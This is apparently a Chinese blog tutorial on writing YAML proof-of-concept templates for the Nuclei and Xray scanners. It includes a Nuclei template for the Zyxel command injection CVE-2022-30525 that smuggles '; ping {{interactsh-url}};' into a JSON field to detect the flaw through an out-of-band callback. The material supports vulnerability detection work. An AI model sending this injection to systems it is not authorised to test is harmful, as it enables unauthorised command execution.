初识 POC & Yaml 编写
一、YAML 数据序列化语言
- 大小写敏感
- 缩进表示层级关系,使用空格缩进【不使用Tab键缩进】
- 空格数不重要,同层级共元素对其即可
二、Nuclei YAML Poc 模板编写
1、编号 id 【项目名称(独立编号)】
2、信息 info【详细信息】
3、请求 http、tcp、dns 等【漏洞利用】
【漏洞利用后结果判断👇】
4、匹配 matchers Interactsh
5、提取 extractours
编写参考:
漏洞无回显需要使用反连平台:
#以 zyxel 未经身份验证的远程命令注入漏洞为例 CVE-2022-30525
http:
- raw:
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Type: application/json
Accept-Encoding: gzip
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{exp}}","data":"hi"}
payloads:
exp:
- "; ping {{interactsh-url}};"
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
三、YAML Poc Burpsuite Nuclei模板插件
1、Burpsuite 插件商城中下载 Nuclei Template Generator Plugin 插件
2、复现漏洞数据包 --> 右键将漏洞数据包发到模板插件
3、将数据包特征信息发送到模板插件
四、Xray YAML Poc 模板编写
漏洞无回显需要使用反连平台:
1、自主搭建反连平台,并且修改 Xray 配置文件
2、需要检测漏洞回显信息【需要注册域名;修改host文件可以反连到服务器但是无法返回漏洞信息】
posted on
浙公网安备 33010602011771号